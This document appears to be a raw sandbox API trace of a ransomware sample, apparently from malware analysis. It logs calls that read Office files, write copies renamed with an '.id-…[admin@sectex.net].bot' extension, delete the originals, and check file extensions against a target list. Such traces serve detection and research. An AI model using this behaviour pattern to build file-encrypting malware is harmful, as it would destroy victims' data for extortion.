	[0158.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.706] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.706] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0158.708] GetLastError () returned 0x0
	[0158.708] ReadFile (in: hFile=0x3b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xf978, lpOverlapped=0x0) returned 1
	[0158.711] WriteFile (in: hFile=0x1b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf980, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf980, lpOverlapped=0x0) returned 1
	[0158.713] ReadFile (in: hFile=0x3b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.713] WriteFile (in: hFile=0x1b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0158.713] SetEndOfFile (hFile=0x1b4) returned 1
	[0158.713] CloseHandle (hObject=0x1b4) returned 1
	[0158.713] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.713] SetEndOfFile (hFile=0x3b8) returned 1
	[0158.716] CloseHandle (hObject=0x3b8) returned 1
	[0158.717] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.717] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\odbc.sam")) returned 1
	[0158.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.718] lstrlenW (lpString=".doc") returned 4
	[0158.718] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.718] lstrlenW (lpString=".docx") returned 5
	[0158.718] lstrcmpiW (lpString1=".docx", lpString2="C.SAM") returned -1
	[0158.718] lstrlenW (lpString=".pdf") returned 4
	[0158.718] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.718] lstrlenW (lpString=".xls") returned 4
	[0158.718] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.718] lstrlenW (lpString=".xlsx") returned 5
	[0158.718] lstrcmpiW (lpString1=".xlsx", lpString2="C.SAM") returned -1
	[0158.718] lstrlenW (lpString=".ppt") returned 4
	[0158.718] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.718] lstrlenW (lpString=".zip") returned 4
	[0158.718] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.718] lstrlenW (lpString=".rar") returned 4
	[0158.718] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.718] lstrlenW (lpString=".bz2") returned 4
	[0158.718] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.718] lstrlenW (lpString=".7z") returned 3
	[0158.718] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.718] lstrlenW (lpString=".dbf") returned 4
	[0158.718] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.718] lstrlenW (lpString=".1cd") returned 4
	[0158.718] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.718] lstrlenW (lpString=".jpg") returned 4
	[0158.719] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.719] lstrlenW (lpString=".doc") returned 4
	[0158.719] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.719] lstrlenW (lpString=".docx") returned 5
	[0158.719] lstrcmpiW (lpString1=".docx", lpString2="C.SAM") returned -1
	[0158.719] lstrlenW (lpString=".pdf") returned 4
	[0158.719] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.719] lstrlenW (lpString=".xls") returned 4
	[0158.719] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.719] lstrlenW (lpString=".xlsx") returned 5
	[0158.719] lstrcmpiW (lpString1=".xlsx", lpString2="C.SAM") returned -1
	[0158.719] lstrlenW (lpString=".ppt") returned 4
	[0158.719] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.719] lstrlenW (lpString=".zip") returned 4
	[0158.719] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.719] lstrlenW (lpString=".rar") returned 4
	[0158.719] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.719] lstrlenW (lpString=".bz2") returned 4
	[0158.719] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.719] lstrlenW (lpString=".7z") returned 3
	[0158.719] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.719] lstrlenW (lpString=".dbf") returned 4
	[0158.719] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.719] lstrlenW (lpString=".1cd") returned 4
	[0158.719] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\ODBC.SAM") returned 59
	[0158.720] lstrlenW (lpString=".jpg") returned 4
	[0158.720] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.720] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0158.720] lstrlenW (lpString="OL.SAM") returned 6
	[0158.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ol.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.722] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=29056) returned 1
	[0158.722] CloseHandle (hObject=0x3b8) returned 1
	[0158.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ol.sam")) returned 0x20
	[0158.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ol.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ol.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0158.722] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.723] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ol.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0158.723] GetLastError () returned 0x0
	[0158.723] ReadFile (in: hFile=0x3b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x7180, lpOverlapped=0x0) returned 1
	[0158.728] WriteFile (in: hFile=0x1b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x7190, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x7190, lpOverlapped=0x0) returned 1
	[0158.729] ReadFile (in: hFile=0x3b8, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.729] WriteFile (in: hFile=0x1b4, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0158.729] SetEndOfFile (hFile=0x1b4) returned 1
	[0158.729] CloseHandle (hObject=0x1b4) returned 1
	[0158.729] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.729] SetEndOfFile (hFile=0x3b8) returned 1
	[0158.732] CloseHandle (hObject=0x3b8) returned 1
	[0158.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.732] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\ol.sam")) returned 1
	[0158.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.733] lstrlenW (lpString=".doc") returned 4
	[0158.733] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.733] lstrlenW (lpString=".docx") returned 5
	[0158.733] lstrcmpiW (lpString1=".docx", lpString2="L.SAM") returned -1
	[0158.733] lstrlenW (lpString=".pdf") returned 4
	[0158.733] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.733] lstrlenW (lpString=".xls") returned 4
	[0158.733] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.733] lstrlenW (lpString=".xlsx") returned 5
	[0158.733] lstrcmpiW (lpString1=".xlsx", lpString2="L.SAM") returned -1
	[0158.733] lstrlenW (lpString=".ppt") returned 4
	[0158.733] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.733] lstrlenW (lpString=".zip") returned 4
	[0158.733] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.733] lstrlenW (lpString=".rar") returned 4
	[0158.733] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.733] lstrlenW (lpString=".bz2") returned 4
	[0158.733] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.733] lstrlenW (lpString=".7z") returned 3
	[0158.733] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.733] lstrlenW (lpString=".dbf") returned 4
	[0158.733] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.733] lstrlenW (lpString=".1cd") returned 4
	[0158.733] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.733] lstrlenW (lpString=".jpg") returned 4
	[0158.733] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.734] lstrlenW (lpString=".doc") returned 4
	[0158.734] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.734] lstrlenW (lpString=".docx") returned 5
	[0158.734] lstrcmpiW (lpString1=".docx", lpString2="L.SAM") returned -1
	[0158.734] lstrlenW (lpString=".pdf") returned 4
	[0158.734] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.734] lstrlenW (lpString=".xls") returned 4
	[0158.734] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.734] lstrlenW (lpString=".xlsx") returned 5
	[0158.734] lstrcmpiW (lpString1=".xlsx", lpString2="L.SAM") returned -1
	[0158.734] lstrlenW (lpString=".ppt") returned 4
	[0158.734] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.734] lstrlenW (lpString=".zip") returned 4
	[0158.734] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.734] lstrlenW (lpString=".rar") returned 4
	[0158.734] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.734] lstrlenW (lpString=".bz2") returned 4
	[0158.734] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.734] lstrlenW (lpString=".7z") returned 3
	[0158.734] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.734] lstrlenW (lpString=".dbf") returned 4
	[0158.734] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.734] lstrlenW (lpString=".1cd") returned 4
	[0158.734] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OL.SAM") returned 57
	[0158.734] lstrlenW (lpString=".jpg") returned 4
	[0158.735] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.735] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0158.735] lstrlenW (lpString="OLADD.FAE") returned 9
	[0158.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.937] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=133024) returned 1
	[0158.937] CloseHandle (hObject=0x388) returned 1
	[0158.937] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae")) returned 0x20
	[0158.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0158.952] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.952] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0158.953] GetLastError () returned 0x0
	[0158.953] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x207a0, lpOverlapped=0x0) returned 1
	[0158.979] WriteFile (in: hFile=0x398, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x207b0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x207b0, lpOverlapped=0x0) returned 1
	[0158.982] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.982] WriteFile (in: hFile=0x398, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0158.982] SetEndOfFile (hFile=0x398) returned 1
	[0158.982] CloseHandle (hObject=0x398) returned 1
	[0158.983] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.983] SetEndOfFile (hFile=0x3d0) returned 1
	[0158.986] CloseHandle (hObject=0x3d0) returned 1
	[0158.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.012] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oladd.fae")) returned 1
	[0159.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.013] lstrlenW (lpString=".doc") returned 4
	[0159.013] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.013] lstrlenW (lpString=".docx") returned 5
	[0159.013] lstrcmpiW (lpString1=".docx", lpString2="D.FAE") returned -1
	[0159.013] lstrlenW (lpString=".pdf") returned 4
	[0159.013] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.013] lstrlenW (lpString=".xls") returned 4
	[0159.013] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.013] lstrlenW (lpString=".xlsx") returned 5
	[0159.013] lstrcmpiW (lpString1=".xlsx", lpString2="D.FAE") returned -1
	[0159.013] lstrlenW (lpString=".ppt") returned 4
	[0159.013] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.013] lstrlenW (lpString=".zip") returned 4
	[0159.013] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.013] lstrlenW (lpString=".rar") returned 4
	[0159.014] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.014] lstrlenW (lpString=".bz2") returned 4
	[0159.014] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.014] lstrlenW (lpString=".7z") returned 3
	[0159.014] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.014] lstrlenW (lpString=".dbf") returned 4
	[0159.014] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.014] lstrlenW (lpString=".1cd") returned 4
	[0159.014] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.014] lstrlenW (lpString=".jpg") returned 4
	[0159.014] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.014] lstrlenW (lpString=".doc") returned 4
	[0159.014] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.014] lstrlenW (lpString=".docx") returned 5
	[0159.014] lstrcmpiW (lpString1=".docx", lpString2="D.FAE") returned -1
	[0159.014] lstrlenW (lpString=".pdf") returned 4
	[0159.015] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.015] lstrlenW (lpString=".xls") returned 4
	[0159.015] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.015] lstrlenW (lpString=".xlsx") returned 5
	[0159.015] lstrcmpiW (lpString1=".xlsx", lpString2="D.FAE") returned -1
	[0159.015] lstrlenW (lpString=".ppt") returned 4
	[0159.015] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.015] lstrlenW (lpString=".zip") returned 4
	[0159.015] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.015] lstrlenW (lpString=".rar") returned 4
	[0159.015] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.015] lstrlenW (lpString=".bz2") returned 4
	[0159.015] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.015] lstrlenW (lpString=".7z") returned 3
	[0159.015] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.015] lstrlenW (lpString=".dbf") returned 4
	[0159.015] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.015] lstrlenW (lpString=".1cd") returned 4
	[0159.015] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLADD.FAE") returned 60
	[0159.015] lstrlenW (lpString=".jpg") returned 4
	[0159.015] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.015] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0159.015] lstrlenW (lpString="OLJRNL.FAE") returned 10
	[0159.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.407] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=71584) returned 1
	[0159.407] CloseHandle (hObject=0x1b4) returned 1
	[0159.408] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae")) returned 0x20
	[0159.408] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLJRNL.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\oljrnl.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0159.408] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.409] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
